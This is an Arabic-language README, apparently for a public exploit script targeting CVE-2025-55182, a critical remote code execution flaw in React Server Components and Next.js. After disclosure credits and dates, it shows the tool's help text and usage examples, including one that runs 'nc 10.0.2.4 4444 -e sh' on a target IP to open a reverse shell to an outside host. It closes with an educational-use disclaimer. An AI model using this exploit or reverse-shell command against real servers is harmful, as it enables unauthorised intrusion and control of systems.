
استغلال CVE-2025-55182 | بواسطة infrar3d
تم استغلالها بواسطة infrar3d
ثغرة أمنية حرجة بتصنيف 10.0 تؤثر على الاستخدام من جانب الخادم في React.js، ويتم تتبعها برقم CVE-2025-55182 في React.js وCVE-2025-66478 خصيصًا لإطار العمل Next.js.
تم الكشف عن هذه الثغرة بشكل مسؤول بواسطة Lachlan Davidson في 29 نوفمبر 2025 بتوقيت المحيط الهادئ (PT) لفريق Meta. تم إجراء الكشف الأولي وإصدار التصحيح بواسطة React وVercel في 3 ديسمبر 2025 بتوقيت المحيط الهادئ (PT). (الأصل: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
تم توفير هذا البرنامج وكود إثبات المفهوم لأغراض تعليمية وبحثية فقط.
أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمه بأخلاق ومسؤولية.